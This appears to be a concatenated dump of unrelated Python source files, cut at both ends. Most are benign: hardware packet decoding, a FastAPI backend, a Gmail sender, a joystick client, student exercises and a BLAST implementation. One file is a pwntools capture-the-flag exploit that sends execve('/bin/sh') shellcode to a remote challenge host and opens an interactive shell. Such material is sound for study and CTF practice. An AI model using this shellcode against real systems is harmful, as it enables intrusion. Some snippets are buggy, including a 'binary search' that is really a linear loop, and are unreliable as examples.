delta: Signal(13)
The delta from the aligned bus interval and ITP transmission.
"""
def __init__(self):
#
# I/O port
#
self.header_sink = HeaderQueue()
self.update_received = Signal()
self.bus_interval_counter = Signal()
self.delta = Signal()
def elaborate(self, platform):
m = Module()
# Accept any Isochronous Timestamp Packet...
new_packet = self.header_sink.valid
is_for_us = self.header_sink.get_type() == HeaderPacketType.ISOCHRONOUS_TIMESTAMP
with m.If(new_packet & is_for_us):
m.d.comb += self.header_sink.ready.eq(1)
# ... and extract its fields.
packet = self.header_sink.header
m.d.ss += [
self.update_received .eq(1),
self.bus_interval_counter .eq(packet.dw0[ 5:19]),
self.delta .eq(packet.dw0[19:32])
]
with m.Else():
m.d.ss += self.update_received.eq(0)
return m
|
from chatbot import Chat, register_call
import wikipedia
@register_call("whoIs")
def who_is(query, session_id="general"):
try:
return wikipedia.summary(query)
except Exception:
for new_query in wikipedia.search(query):
try:
return wikipedia.summary(new_query)
except Exception:
pass
return "I don't know about " + query
who_is('obamadsd .,f.,.,sd')
|
n = [123, 12, 56, 34, 87, 9, 10, 13]
summa = 0 # здесь буду считать сумму
multiply = 1 # здесь буду считать произведение
for number in n: # перебираю список из чисел
summa = summa + number # складываю каждое число из списка с переменной s
multiply = multiply * number # перемножаю каждое число с переменной m
print('Сумма:', summa) # вывожу элементы
print('Произведение:', multiply) # вывожу элементы
|
""" Binary Search Algorithm
----------------------------------------
"""
# // iterative implementation of binary search in Python
import random
def binary_search(a_list, item):
"""Performs iterative binary search to find the position of an integer in a given, sorted, list.
a_list -- sorted list of integers
item -- integer you are searching for the position of
"""
first = 0
last = len(a_list) - 1
while first <= last:
# i = int((first + last) / 2)
# if a_list[i] == item:
# return '{} found at position {}'.format(item=item, i=i)
# elif a_list[i] > item:
# last = i - 1
# elif a_list[i] < item:
# first = i + 1
# else:
# return '{} not found in the list'.format(item=item)
for i in range(len(a_list)):
if a_list[i] == item:
return '{} found at position {}'.format(item, i)
elif a_list[i] > item:
last = i - 1
elif a_list[i] < item:
first = i + 1
else:
return '{} not found in the list'.format(item)
# // recursive implementation of binary search in Python
def binary_search_recursive(a_list, item):
"""Performs recursive binary search of an integer in a given, sorted, list.
a_list -- sorted list of integers
item -- integer you are searching for the position of
"""
first = 0
last = len(a_list) - 1
if len(a_list) == 0:
return '{} was not found in the list'.format(item)
else:
i = (first + last) // 2
if item == a_list[i]:
return '{} was found in list at index {}'.format(item, i)
else:
if a_list[i] < item:
return binary_search_recursive(a_list[i + 1:], item)
else:
return binary_search_recursive(a_list[:i], item)
a = [n for n in range(1, 100, 2)]
print(binary_search(a, random.choice(a)))
print(binary_search_recursive(a, random.choice(a)))
# for items, index in enumerate(a):
# print(items,'--->', index)
|
from logging import exception
from typing import NewType
from fastapi import FastAPI as fast, params
from fastapi import HTTPException
from fastapi.middleware.cors import CORSMiddleware
from database import *
origins = ["http://localhost:3000", "http://localhost", "http://localhost:5000", "https://jackmaster110.github.io"]
app = fast()
app.add_middleware(
CORSMiddleware,
allow_origins=origins,
allow_credentials=True,
allow_methods=["*"],
allow_headers=["*"]
)
@app.get("/")
def get_root():
return { "Ping": "Pong" }
#pass in a string `nanoid`
@app.get("/api/get-user/{nanoid}", response_model=UserModel)
async def get_user(nanoid: str):
userSearched = await fetch_one_user(nanoid)
if not userSearched: raise HTTPException(500, "Internal server error searching user")
return userSearched
@app.get("/api/get-users")
async def get_all_users():
users = await fetch_all_users()
if not users : raise HTTPException(500, "Internal server error when fetching users")
return users
# pass in a string `nanoid`
@app.get("/api/get-post/{nanoid}", response_model=PostModel)
async def get_post(nanoid: str):
post = await fetch_one_post(nanoid)
if not post: raise HTTPException(500, "Internal server error")
return post
# pass in a string `user`
@app.get("/api/get-posts/{user}")
async def get_users_posts(user: str):
posts = await fetch_all_posts_from_user(user)
if not posts: raise HTTPException(500, "Internal server error occured when fetching posts")
return posts
@app.get("/api/get-posts")
async def get_all_posts():
posts = await fetch_all_posts()
if not posts: raise HTTPException(500, "Internal server error when fetching posts")
return posts
@app.get("/api/get-replies/{nanoid}")
async def get_all_replies_on_post(nanoid: str):
replies = await fetch_all_replies(nanoid)
if not replies: raise HTTPException(500, "Internal server error when fetching replies")
return replies
# pass in a UserModel object `user`
@app.post("/api/add-user", response_model=UserModel)
async def add_user(user: UserModel):
userCreated = await create_user(user)
if not userCreated: raise HTTPException(500, "Internal server error while creating user")
return userCreated
# pass in a PostModel object `post`
@app.post("/api/add-post", response_model=PostModel )
async def add_post(post: PostModel):
postCreated = await create_post(post)
if not postCreated: raise HTTPException(500, "Internal server error while creating post")
return postCreated
@app.post("/api/add-reply/{nanoid}")
async def add_reply(reply: PostModel, nanoid: str):
postUpdated = await create_comment(reply, nanoid)
if not postUpdated: raise HTTPException(500, "Internal server error while creating reply")
return postUpdated |
import base64
import httplib2
import os
from apiclient import discovery
from googleapiclient import errors
from oauth2client import client
from oauth2client import tools
from oauth2client.file import Storage
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
SCOPES = 'https://www.googleapis.com/auth/gmail.compose'
CLIENT_SECRET_FILE = 'client_secret.json'
def get_credentials():
run_dir = os.getcwd()
credential_dir = os.path.join(run_dir, 'credential')
if not os.path.exists(credential_dir):
os.makedirs(credential_dir)
credential_path = os.path.join(credential_dir, 'gmail-user-auth.json')
store = Storage(credential_path)
credentials = store.get()
if not credentials or credentials.invalid:
flow = client.flow_from_clientsecrets(os.path.join(credential_dir, CLIENT_SECRET_FILE),
SCOPES)
credentials = tools.run_flow(flow, store)
print('Storing credentials to ' + credential_path)
return credentials
def send_email(service, emails, nomeRoteiro, mensagem):
sender = "me"
subject = "A nota do " + nomeRoteiro + " está pronta, vai lá e dá uma sacada :)"
message = create_email(sender, emails, subject, nomeRoteiro, mensagem)
try:
message = (service.users().messages().send(userId=sender, body=message)
.execute())
print('Message Id: %s' % message['id'])
return message
except errors.HttpError as error:
print('An error occurred: %s' % error)
def create_email(sender, to, subject, nomeRoteiro, mensagem):
message = MIMEMultipart('related')
message['from'] = sender
message['to'] = to
message['subject'] = subject
body = MIMEMultipart('alternative')
message.attach(body)
html = "<h1>%s</h1>" % (mensagem)
format_html = MIMEText(html, 'html')
body.attach(format_html)
return {'raw': base64.urlsafe_b64encode(message.as_bytes()).decode()}
def enviarEmail(emailUsuario, nomeRoteiro, mensagem):
credentials = get_credentials()
http = credentials.authorize(httplib2.Http())
service = discovery.build('gmail', 'v1', http=http)
send_email(service, emailUsuario, nomeRoteiro, mensagem) |
from threading import Thread
import pygame
from lib.SocketClient import SocketClient
from lib.constants import *
import numpy as np
class Joystick(object):
def __init__(self):
pygame.init()
pygame.joystick.init()
self.joystick = pygame.joystick.Joystick(0)
self.joystick.init()
self.thread = Thread(target=self.broadcast, daemon=True)
self.axis_data = {}
self.button_data = {}
if len(self.button_data) <= 0:
for i in range(self.joystick.get_numbuttons()):
self.button_data[i] = False
self.hat_data = {0: (0, 0)}
if len(self.hat_data):
for i in range(self.joystick.get_numhats()):
self.hat_data[i] = (0, 0)
self.client = SocketClient(SOCKET_ID_JOYSTICK)
self.client.connect()
# Start listen thread so it will automatically reconnect
Thread(target=self.client.listen, args=(self.on_message,), daemon=True).start()
self.clock = pygame.time.Clock()
# Current controller positions
self.forward = 0
self.reverse = 0
self.left = False
self.right = False
def listen(self):
"""Listen for events from the joystick."""
self.thread.start()
while True:
self.clock.tick(10)
for event in pygame.event.get():
if event.type == pygame.JOYAXISMOTION:
self.axis_data[event.axis] = round(event.value, 2)
elif event.type == pygame.JOYBUTTONDOWN:
self.button_data[event.button] = True
elif event.type == pygame.JOYBUTTONUP:
self.button_data[event.button] = False
elif event.type == pygame.JOYHATMOTION:
self.hat_data[event.hat] = event.value
button_l2 = self.button_data[6]
button_r2 = self.button_data[7]
# Both buttons pressed
if button_l2 and button_r2:
self.forward = 0
self.reverse = 0
elif button_l2:
mapped_l2_value = int(np.interp(self.axis_data[4], (-1, 1), (0, 100)))
self.reverse = mapped_l2_value
elif button_r2:
mapped_r2_value = int(np.interp(self.axis_data[5], (-1, 1), (0, 100)))
self.forward = mapped_r2_value
# Neither button pressed
elif not button_l2 and not button_r2:
self.forward = 0
self.reverse = 0
direction = self.hat_data[0][0]
if direction == 1:
self.left = False
self.right = True
elif direction == -1:
self.left = True
self.right = False
else:
self.left = False
self.right = False
def on_message(self, message):
print(message)
def broadcast(self):
while True:
self.clock.tick(10)
if not self.client.connected:
continue
# Steering
if self.left:
print('STEER: Left')
self.client.send_command(SOCKET_JOY_DIR_LEFT)
elif self.right:
print('STEER: Right')
self.client.send_command(SOCKET_JOY_DIR_RIGHT)
else:
print('STEER: Neutral')
self.client.send_command(SOCKET_JOY_DIR_NEUTRAL)
# Speed
if self.forward > 0:
print('Forward', self.forward)
self.client.send_command(SOCKET_JOY_FORWARD, self.forward)
elif self.reverse > 0:
print('Reverse', self.reverse)
self.client.send_command(SOCKET_JOY_BACKWARD, self.reverse)
else:
print('Neutral')
self.client.send_command(SOCKET_JOY_NEUTRAL)
if __name__ == '__main__':
joystick = Joystick()
joystick.listen()
|
from datetime import timedelta
from datetime import datetime
from shared.utils import get_time_of_night
from frontend_manager.py.utils.BaseWidget import BaseWidget
# ------------------------------------------------------------------
class CommentSched(BaseWidget):
# ------------------------------------------------------------------
#
# ------------------------------------------------------------------
def __init__(self, widget_id=None, sm=None, *args, **kwargs):
# standard common initialisations
BaseWidget.__init__(
self,
widget_id=widget_id,
sm=sm,
)
# # widget-specific initialisations
# self.block_keys = [['wait'], ['run'], ['done', 'cancel', 'fail']]
# self.blocks = {}
# for keys_now in self.block_keys:
# self.blocks[keys_now[0]] = []
# self.time_of_night = {}
# self.inst_health = []
# self.tel_ids = self.sm.inst_data.get_inst_ids(
# inst_types=['LST', 'MST', 'SST']
# )
# # FIXME - need to add lock?
# if len(self.inst_health) == 0:
# for id_now in self.tel_ids:
# self.inst_health.append({'id': id_now, 'val': 0})
return
# ------------------------------------------------------------------
async def setup(self, *args):
# standard common initialisations
await BaseWidget.setup(self, args)
# initialise dataset and send to client
opt_in = {
'widget': self,
'event_name': 'init_data',
'data_func': self.get_data,
}
await self.sm.emit_widget_event(opt_in=opt_in)
# start an update loop for this particular instance
opt_in = {
'widget': self,
'loop_scope': 'unique_by_id',
'data_func': self.get_data,
'sleep_sec': 3,
'loop_id': 'update_data_widget_id',
'event_name': 'update_data',
}
await self.sm.add_widget_loop(opt_in=opt_in)
return
# ------------------------------------------------------------------
async def back_from_offline(self, *args):
# standard common initialisations
await BaseWidget.back_from_offline(self, args)
return
# ------------------------------------------------------------------
async def get_data(self):
# self.time_of_night = get_time_of_night(self)
# time_of_night_date = {
# 'date_start':
# datetime(2018, 9, 16, 21, 30).strftime('%Y-%m-%d %H:%M:%S'),
# 'date_end': (
# datetime(2018, 9, 16, 21, 30)
# + timedelta(seconds=int(self.time_of_night['end']))
# ).strftime('%Y-%m-%d %H:%M:%S'),
# 'date_now': (
# datetime(2018, 9, 16, 21, 30)
# + timedelta(seconds=int(self.time_of_night['now']))
# ).strftime('%Y-%m-%d %H:%M:%S'),
# 'now':
# int(self.time_of_night['now']),
# 'start':
# int(self.time_of_night['start']),
# 'end':
# int(self.time_of_night['end'])
# }
# self.get_blocks()
# self.get_tel_health()
# self.get_events()
# self.get_clock_events()
# data = {
# 'time_of_night': time_of_night_date,
# 'inst_health': self.inst_health,
# 'blocks': self.blocks,
# 'external_events': self.external_events,
# 'external_clock_events': self.external_clock_events
# }
# return data
return {}
# # ------------------------------------------------------------------
# def get_events(self):
# pipe = self.redis.get_pipe()
# pipe.get(name='external_events')
# redis_data = pipe.execute()
# self.external_events = redis_data
# return
# def get_clock_events(self):
# pipe = self.redis.get_pipe()
# pipe.get(name='external_clock_events')
# redis_data = pipe.execute()
# self.external_clock_events = redis_data
# return
# # ------------------------------------------------------------------
# def get_tel_health(self):
# pipe = self.redis.get_pipe()
# for id_now in self.tel_ids:
# pipe.h_get(name='inst_health_summary;' + str(id_now), key='health')
# redis_data = pipe.execute()
# for i in range(len(redis_data)):
# id_now = self.tel_ids[i]
# self.inst_health[i]['val'] = redis_data[i]
# return
# # ------------------------------------------------------------------
# def get_blocks(self):
# for keys_now in self.block_keys:
# pipe = self.redis.get_pipe()
# for key in keys_now:
# pipe.get('obs_block_ids_' + key)
# data = pipe.execute()
# obs_block_ids = sum(data, []) # flatten the list of lists
# pipe = self.redis.get_pipe()
# for obs_block_id in obs_block_ids:
# pipe.get(obs_block_id)
# key = keys_now[0]
# blocks = pipe.execute()
# self.blocks[key] = sorted(
# blocks, key=lambda a: float(a['time']['start'])
# # cmp=lambda a, b: int(a['time']['start']) - int(b['time']['start'])
# )
# return
|
from direct.directnotify import DirectNotifyGlobal
from pirates.instance.DistributedInstanceBaseAI import DistributedInstanceBaseAI
from pirates.world.DistributedIslandAI import DistributedIslandAI
class DistributedInstanceWorldAI(DistributedInstanceBaseAI):
notify = DirectNotifyGlobal.directNotify.newCategory('DistributedInstanceWorldAI')
def __init__(self, air, fileName=""):
DistributedInstanceBaseAI.__init__(self, air, fileName)
self.fileName = fileName
self.activeIslands = set()
def announceGenerate(self):
DistributedInstanceBaseAI.announceGenerate(self)
def generateIslands(self, islandModel, name, uid, isDockable, gameZone):
self.island = DistributedIslandAI(self.air, islandModel, name, uid)
self.island.generateWithRequired(zoneId=gameZone)
self.island.d_setZoneSphereSize(rad0=1000, rad1=2000, rad2=3000)
self.island.d_setIslandModel(islandModel=self.island.getIslandModel())
self.island.d_setUndockable(undockable=isDockable)
self.activeIslands.add(self.island)
if self.island:
self.air.notify.info("Created island: %s" % (name)) |
def ask_to_continue():
while True:
enput = input('\nContinue? [y/n] : ')
if enput in ("y", "Y"):
self.enter_sales_figures()
elif enput in ("n", "N"):
self.print_dict_with_total()
if __name__ == '__main__':
print('\n---Sales Reporting---')
de = Dataentry()
de.main() |
n = str(input("Introduti numele: "))
print("Salut "+ n,"!") |
# this one is like your scripts with argv
def print_two(*args):
arg1, arg2 = args
print "arg1: %r, arg2: %r" %(arg1, arg2)
# Ok, that *args is actually pointless, we can just do this
def print_two_again(arg1, arg2):
print "arg1: %r, arg2: %r" %(arg1, arg2)
print_two("first","second")
print_two_again("first","second")
|
divida = float(input("Sua divida: "))
taxa = float(input("Taxa de juros: "))
Pagamento = float(input("Pagamento mensal: "))
mes = 1
tristeza = divida * (taxa / 100)
if tristeza > Pagamento:
print("Sua divida não será paga nunca, pois os juros são superiores ao pagamento mensal")
else:
saldo = divida
juros_pago = 0
while saldo > Pagamento:
juros = saldo * taxa / 100
saldo = juros_pago + juros - Pagamento
juros_pago = juros_pago + juros
print(f"Saldo da divida no mes {mes} é de R${saldo:6.2f}")
mes = mes + 1
print(f"Para pagar uma divida de R${divida:8.2f}, a {taxa:5.2f} % de juros, ")
print(f"você precisará de {mes - 1} meses, pagando um total de R${juros_pago:8.2f} de juros")
print(f"No ultimo mes, voce teria um saldo residual de R${saldo:8.2f} a pagar") |
# Copyright 2022 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import annotations
import textwrap
from pathlib import Path
import pytest
from pants.backend.go import target_type_rules
from pants.backend.go.goals import generate
from pants.backend.go.goals.generate import GoGenerateGoal, OverwriteMergeDigests, _expand_env
from pants.backend.go.target_types import GoModTarget, GoPackageTarget
from pants.backend.go.util_rules import (
assembly,
build_pkg,
build_pkg_target,
first_party_pkg,
go_mod,
link,
sdk,
tests_analysis,
third_party_pkg,
)
from pants.core.goals.test import get_filtered_environment
from pants.core.util_rules import source_files
from pants.engine.fs import DigestContents, FileContent
from pants.engine.rules import QueryRule
from pants.testutil.rule_runner import PYTHON_BOOTSTRAP_ENV, RuleRunner
@pytest.fixture
def rule_runner() -> RuleRunner:
rule_runner = RuleRunner(
rules=[
*generate.rules(),
# to avoid rule graph errors?
*assembly.rules(),
*build_pkg.rules(),
*build_pkg_target.rules(),
*first_party_pkg.rules(),
*go_mod.rules(),
*link.rules(),
*sdk.rules(),
*target_type_rules.rules(),
*tests_analysis.rules(),
*third_party_pkg.rules(),
*source_files.rules(),
get_filtered_environment,
QueryRule(DigestContents, (OverwriteMergeDigests,)),
],
target_types=[GoModTarget, GoPackageTarget],
preserve_tmpdirs=True,
)
rule_runner.set_options([], env_inherit=PYTHON_BOOTSTRAP_ENV)
return rule_runner
# Adapted from Go toolchain.
# See https://github.com/golang/go/blob/cc1b20e8adf83865a1dbffa259c7a04ef0699b43/src/os/env_test.go#L14-L67
#
# Original copyright:
# // Copyright 2010 The Go Authors. All rights reserved.
# // Use of this source code is governed by a BSD-style
# // license that can be found in the LICENSE file.
_EXPAND_TEST_CASES = [
("", ""),
("$*", "all the args"),
("$$", "PID"),
("${*}", "all the args"),
("$1", "ARGUMENT1"),
("${1}", "ARGUMENT1"),
("now is the time", "now is the time"),
("$HOME", "/usr/gopher"),
("$home_1", "/usr/foo"),
("${HOME}", "/usr/gopher"),
("${H}OME", "(Value of H)OME"),
("A$$$#$1$H$home_1*B", "APIDNARGSARGUMENT1(Value of H)/usr/foo*B"),
("start$+middle$^end$", "start$+middle$^end$"),
("mixed$|bag$$$", "mixed$|bagPID$"),
("$", "$"),
("$}", "$}"),
("${", ""), # invalid syntax; eat up the characters
("${}", ""), # invalid syntax; eat up the characters
]
@pytest.mark.parametrize("input,output", _EXPAND_TEST_CASES)
def test_expand_env(input, output) -> None:
m = {
"*": "all the args",
"#": "NARGS",
"$": "PID",
"1": "ARGUMENT1",
"HOME": "/usr/gopher",
"H": "(Value of H)",
"home_1": "/usr/foo",
"_": "underscore",
}
assert _expand_env(input, m) == output
def test_generate_run_commands(rule_runner: RuleRunner) -> None:
rule_runner.write_files(
{
"grok/BUILD": "go_mod(name='mod')\ngo_package()",
"grok/go.mod": "module example.com/grok\n",
"grok/gen.go": textwrap.dedent(
"""\
//go:build generate
package grok
//go:generate -command shell /bin/sh -c
//go:generate shell "echo grok-$GOLINE > generated.txt"
"""
),
"grok/empty.go": "package grok\n",
}
)
result = rule_runner.run_goal_rule(GoGenerateGoal, args=["grok::"], env_inherit={"PATH"})
assert result.exit_code == 0
generated_file = Path(rule_runner.build_root, "grok", "generated.txt")
assert generated_file.read_text() == "grok-4\n"
def test_overwrite_merge_digests(rule_runner: RuleRunner) -> None:
orig_snapshot = rule_runner.make_snapshot(
{
"dir1/orig.txt": "orig",
"dir1/foo/only-orig.txt": "orig",
"dir1/shared.txt": "orig",
}
)
new_snapshot = rule_runner.make_snapshot(
{
"dir1/new.txt": "new",
"dir1/bar/only-new.txt": "new",
"dir1/shared.txt": "new",
}
)
raw_entries = rule_runner.request(
DigestContents, [OverwriteMergeDigests(orig_snapshot.digest, new_snapshot.digest)]
)
entries = sorted(raw_entries, key=lambda elem: elem.path)
assert entries == [
FileContent(
path="dir1/bar/only-new.txt",
content=b"new",
),
FileContent(
path="dir1/foo/only-orig.txt",
content=b"orig",
),
FileContent(
path="dir1/new.txt",
content=b"new",
),
FileContent(
path="dir1/orig.txt",
content=b"orig",
),
FileContent(
path="dir1/shared.txt",
content=b"new",
),
]
|
from CallBackOperator import CallBackOperator
from SignalGenerationPackage.DynamicPointsDensitySignal.DynamicPointsDensityUIParameters import DynamicPointsDensityUIParameters
class VerticalOffsetCallBackOperator(CallBackOperator):
def __init__(self, model):
super().__init__(model)
# overridden
def ConnectCallBack(self, window):
self.window = window
self.setup_callback_and_synchronize_slider(
validator_min=DynamicPointsDensityUIParameters.VerticalOffsetSliderMin,
validator_max=DynamicPointsDensityUIParameters.VerticalOffsetSliderMax,
validator_accuracy=DynamicPointsDensityUIParameters.VerticalOffsetLineEditAccuracy,
line_edit=window.VerticalOffsetlineEdit,
slider_min=DynamicPointsDensityUIParameters.VerticalOffsetSliderMin,
slider_max=DynamicPointsDensityUIParameters.VerticalOffsetSliderMax,
slider=window.VerticalOffsethorizontalSlider,
update_slider_func=self.update_vertical_offset_slider,
update_line_edit_func=self.update_vertical_offset_line_edit
)
def update_vertical_offset_slider(self):
self.update_slider(
line_edit=self.window.VerticalOffsetlineEdit,
slider=self.window.VerticalOffsethorizontalSlider,
calc_constant=DynamicPointsDensityUIParameters.VerticalOffsetCalcConstant
)
def update_vertical_offset_line_edit(self):
self.update_line_edit(
line_edit=self.window.VerticalOffsetlineEdit,
slider=self.window.VerticalOffsethorizontalSlider,
calc_constant=DynamicPointsDensityUIParameters.VerticalOffsetCalcConstant,
update_model_func=self.update_vertical_offset
)
def update_vertical_offset(self, val):
self.model.VerticalOffset = val |
from pwn import *
import time
import sys
def exploit():
raw_input('wait')
seen = [0 for i in range(257)]
shellcode = '\x5a\x55\x5e\x5f\x5f\x58\x0f\x05'
print(hex(seen[256]))
proc.sendline(shellcode)
shellcode = '\x90' * 8
shellcode += '\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x53'
shellcode += '\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05'
raw_input('wait')
proc.sendline(shellcode)
if __name__ == '__main__':
context.arch = 'amd64'
connect = 'nc shellcodeme.420blaze.in 420'
connect = connect.split(' ')
if len(sys.argv) > 1:
proc = remote(connect[1], int(connect[2]))
else:
proc = process(['./shellcodeme'], env={'LD_LIBRARY_PATH': './'})
exploit()
proc.interactive()
|
from script.ji_yun_ying_pc.data_config import data_config
import jsonpath
from script.base_api.service_user.auth import auth_employee_post
from script.base_api.service_user.employees import *
from script.base_api.service_user.token import token_valid_get
import allure
import pytest
@allure.feature("不同账号的登录测试")
@allure.testcase("http://132.232.109.76/zentao/testcase-view-24250-1.html")
class TestLogin:
header = {"Content-Type": "application/json;charset=UTF-8"}
@allure.story("测试登录")
@pytest.mark.parametrize("body_data", data_config.login_data)
def test_login(self, body_data):
# 登录
res_json = auth_employee_post(body=body_data, header=TestLogin.header)
tokens = jsonpath.jsonpath(res_json, "$.data.token")
if tokens:
token = tokens[0]
else:
token = "not found"
TestLogin.header["Authorization"] = "Bearer " + token
# 获取用户信息
params = {"token": token}
res_json = employees_info_get(params=params, header=TestLogin.header)
employee_ids = jsonpath.jsonpath(res_json, "$..employeeId")
employee_id = employee_ids[0] if employee_ids else "not found"
# employee_names = jsonpath.jsonpath(res_json, "$..employeeName")
# employee_name = employee_names[0] if employee_names else "not found"
# 获取用户可用模块
employees_employeeId_access_modules_get(employee_id, header=TestLogin.header)
# 判断token是否有效
token_valid_get(header=TestLogin.header)
|
#!/usr/bin/env python
# coding: utf-8
# # Face Detection using OpenCV
# 
# ## 1- Introduction:
# In this task I used OpenCV to detect humen faces in images in Python.
# ## 2- OpenCV:
# It is an open source computer vision library, OpenCV provides a pre-trained models. </br>
# ## 3- Detect Humen Faces in image using OpenCV:
# I used pretrained Haar cascade models to detect faces and eyes in an image, we need to download the trained classifier XML file (haarcascade_frontalface_alt.xml)and (haarcascade_eye_tree_eyeglasses.xml), which is available in OpenCv’s GitHub repository (https://github.com/opencv/opencv/tree/master/data/haarcascades).and save it to your working location.
# ### <li> Libraries:</li>
# 1- <b>cv2 Library:</b> OpenCV library.<br>
# 2- <b>Numpy Library:</b> to search for the row and column values of the face NumPy ndarray. This is the array with the face rectangle coordinates.<br>
# 3- <b>glob Library:</b> is used to retrieve files/pathnames matching a specified pattern.<br>
# 4- <b>matplotlib Library:</b> to draw rectangle an circular around faces and eyes that detect in the image.<br>
#
# ### <li>Steps:</li>
# 1- Import all necessary libraries.<br>
# 2- Load filenames for human images. <br>
# 3- Extract pre-trained face and eye detectors. <br>
# 4- Convert the color images to grayscale it is important step because detection works only on grayscale images.<br>
# 5- Find faces and eyes in image using detectMultiScale function.
# 6- Get bounding box for each detected face and eye: Each face contains a set of coordinate for the rectangle regions where faces were found. We use these coordinates to draw the rectangles in our image.
#
# In[78]:
#importing necessary libraries.
import cv2
import numpy as np
from glob import glob
import matplotlib.pyplot as plt
get_ipython().run_line_magic('matplotlib', 'inline')
# load filenames for human images
human_files = np.array(glob("human_images/*"))
# extract pre-trained face and eye detectors
face_cascade = cv2.CascadeClassifier('haarcascade_frontalface_alt.xml')
eye_cascade = cv2.CascadeClassifier('haarcascade_eye_tree_eyeglasses.xml')
# load color (BGR) image
for image in human_files:
img = cv2.imread(image)
# convert BGR image to grayscale
gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
# find faces in image
faces = face_cascade.detectMultiScale(gray)
eyes = eye_cascade.detectMultiScale(gray)
# print number of faces and eyes detected in the image
print('Number of faces detected:', len(faces))
print('Number of eyes detected:', len(eyes))
# get bounding box for each detected face and eye
for (x,y,w,h) in faces:
# add bounding box to color image
cv2.rectangle(img,(x,y),(x+w,y+h),(191,40,78),2)
for (x2,y2,w2,h2) in eyes:
# add bounding box to color image
radius = int(round((w2 + h2)*0.25))
cv2.circle(img,(x2+w2//2,y2+h2//2),radius, (216,91,255), 2)
# convert BGR image to RGB for plotting
cv_rgb = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
# display the image, along with bounding box
plt.imshow(cv_rgb)
plt.show()
# ## 4- Refrences:
# 1- How to set up your computer to work with the OpenCV library: https://docs.opencv.org/master/df/d65/tutorial_table_of_content_introduction.html<br>
# 2- Face Detection in 2 Minutes using OpenCV & Python: https://towardsdatascience.com/face-detection-in-2-minutes-using-opencv-python-90f89d7c0f81 <br>
# 3- Cascade Classifier: https://docs.opencv.org/master/db/d28/tutorial_cascade_classifier.html<br>
|
#!/usr/bin/python3
# -*-coding:utf-8 -*
from mdBlast import *
from time import time, gmtime, strftime
from datetime import datetime
import sys
import argparse
tps1 = time()
############################################################################
# #
# GESTION DES PARAMETRES #
# #
############################################################################
# Dictionnaire de paramètres (Valeurs par défaut)
parametres = {
"requete": None,
"bdd": "../data/testBDD.fasta",
"matrice": "../data/blosum62.txt",
"version": 1,
"w": 3,
"seuilScore": 0,
"seuilEvalue": 10,
"nbHSP": 250,
"out": "../resultats/results_blast.txt"}
'''
Gestion des paramètres:
8 paramètres :
-h: aide
-r: Chemin vers la séquence requête au format fasta.
-b: Chemin vers la BDD au format fasta ou saved
(précédement construite par une premiere utilisattion avec un fichier fasta).
(Par défaut utilisation de la table de hachage pré-construite fournie)
-m: Chemin vers la matrice de score. (par défaut, matrice blosum62 fournie)
-v: Version de Blast (1 ou 2). (2 non fonctionelle)
-w: Taille des mots. (Par défaut, 3)
-s: Score minimal des HSP en sortie. (Par défaut, 0)
-e: Seuil de e-value. (Par défaut, 10)
-n: Nombre de HSP en sortie. (Par défaut, 250)
-o: fichier de sortie.
'''
if(len(sys.argv) > 16):
sys.exit("erreur: trop de parametres (voir aide -h)")
parser = argparse.ArgumentParser()
parser.add_argument("-r", help="Chemin vers la séquence requête au format fasta.")
parser.add_argument("-b", help="Chemin vers la BDD au format fasta. \n(précédement construite par une premiere utilisattion avec un fichier fasta)\n(Par défaut, utilisation de la table de hachage pré-construite fournie)")
parser.add_argument("-m", help="Chemin vers la matrice de score. (par défaut, matrice blosum62 fournie.")
parser.add_argument("-v", type=int, help="Version de Blast (1 ou 2). (2 non fonctionelle)")
parser.add_argument("-w", type=int, help="Taille des mots. (Par défaut, 3)")
parser.add_argument("-s", type=int, help="Score minimal des HSP en sortie. (Par défaut, 0)")
parser.add_argument("-e", type=float, help="Seuil de e-value. (Par défaut, 10)")
parser.add_argument("-n", type=int, help="Nombre de HSP en sortie. (Par défaut, 250)")
parser.add_argument("-o", help="Fichier de sortie")
args = parser.parse_args()
parametres = verifParametres(args, parametres)
############################################################################
# #
# PROGRAMME PRINCIPAL #
# #
############################################################################
# Importer la séquence requête----------------------------------------------------
print("Importation séquence requête... ")
seqReq = importSeqFasta(parametres["requete"])
# seqReq => (id, séquence)
print("OK\n")
# Importer la matrice de score----------------------------------------------------
print("Importation de la matrice de scores... ")
blosum62 = MatScore(parametres["matrice"])
print("OK\n")
# Création de la table de hachage de mots de W lettres pour la séquence requête---
if parametres["w"] > len(seqReq[1])/2:
sys.exit("erreur: Taille des mots trop grande.")
print("Construction du dictionaire de mots similaires pour la séquence requête... ")
dicoWRequete = dicoMots(seqReq[1], parametres["w"], blosum62)
print("OK\n")
# Importer la base de données----------------------------------------------------
# Si la base est fournie au format fasta, elle est sauvegardée au format saved
# afin de pouvoir être importée plus rapidement les fois suivantes.
print("Importation de la base de donnée... ")
if(parametres["bdd"].split('.')[-1] == "fasta"):
bdd = BDD(parametres["bdd"])
print("OK\n")
# Sauvegarde de la base de donnée sur disque au format saved.
print("Sauvegarde de la base de donnée... ")
res = dumpBDDSaved(parametres["bdd"], bdd)
print('OK ('+res+')\n')
else:
bdd = loadBDDSaved(parametres["bdd"])
print("OK\n")
# Recherche des hits et extension----------------------------------------------------------
print("BLAST en cours... \n")
# Classe au fur et à mesure les HSP par ordre croissant
lScoreCroissant = []
dicoHSP = {}
for motReq in dicoWRequete:
for posMotReq in dicoWRequete[motReq]:
if motReq in bdd.dico_3wBDD.keys():
for infoMotBDD in bdd.dico_3wBDD[motReq]:
# infoMotBDD => (idSequenceBDD, position)
# Si le hit est présent dans un HSP existant, alors il est ignoré.
# Approximation pour gagner du temps de calcul.
if(not (infoMotBDD[0] in dicoHSP and (dicoHSP[infoMotBDD[0]].q_start <= infoMotBDD[1] <= dicoHSP[infoMotBDD[0]].q_end) and (dicoHSP[infoMotBDD[0]].r_start <= posMotReq <= dicoHSP[infoMotBDD[0]].r_end))):
# Extension des hits---------------------------------------------------------
hsp_tmp = HSP(motReq, posMotReq, infoMotBDD)
hsp_tmp.extension(seqReq[1], bdd.dico_seqBDD[infoMotBDD[0]], blosum62)
hsp_tmp.e_value(bdd.sizeBDD)
# Sélection des HSP à conserver----------------------------------------------
# Ignorer les HSP de score trop faible ou de e-value trop élevée.
